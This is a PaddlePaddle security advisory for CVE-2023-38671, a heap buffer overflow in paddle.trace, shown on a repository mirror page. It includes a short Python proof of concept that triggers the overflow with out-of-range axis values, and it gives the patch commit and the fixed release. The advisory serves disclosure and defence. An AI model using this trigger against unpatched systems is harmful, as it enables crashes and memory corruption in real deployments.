Skip to content

P
Paddle

PaddlePaddle / Paddle
大约 1 年 前同步成功

通知 2297
Star 20931
Fork 5422
P
Paddle

体验新版 GitCode,发现更多精彩内容 >>

切换分支/标签
查找文件 普通视图历史永久链接Permalink
pdsa-2023-003.md 1.1 KB
Newer Older
V
update security advisory, test=document_fix (#55690)  
Vigi Zhang 已提交
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 
## PDSA-2023-003: Heap buffer overflow in paddle.trace

### CVE Number

CVE-2023-38671

### Impact

`paddle.trace` has a heap buffer overflow. The PoC is as follows:

```python
import paddle
import numpy as np
from paddle import trace

x = paddle.to_tensor(np.random.uniform(-10, 10, [2, 2, 2]).astype(np.float64))
offset = paddle.to_tensor(np.random.uniform(-10, 10, []).astype(np.int32))
axis1 = paddle.to_tensor(np.random.uniform(-6666666, -2, []).astype(np.int32))
axis2 = paddle.to_tensor(np.random.uniform(-6666666, -2, []).astype(np.int32))

trace(x, offset, axis1, axis2)
```

### Patches

We have patched the issue in commit [12549dfe3e87a4c30f852d2eca81d7f67c8daa87](https://github.com/PaddlePaddle/Paddle/commit/12549dfe3e87a4c30f852d2eca81d7f67c8daa87).
The fix will be included in PaddlePaddle 2.5.0.

### For more information

Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.

### Attribution

This vulnerability has been reported by Tong Liu of ShanghaiTech University.